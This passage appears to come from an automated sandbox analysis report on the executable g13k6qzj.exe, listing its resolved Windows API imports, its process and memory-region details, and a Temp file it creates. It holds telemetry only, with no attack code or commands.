| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-12 16:14:35 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #54: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #54 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Self Terminated |
| Monitor Duration | 00:00:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5d8 |
| Parent PID | 0xea4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
574
0x
A90
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001e0000 | 0x0029dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004effff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x004effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x0058ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x00a30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x01e3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74680000 | 0x74711fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
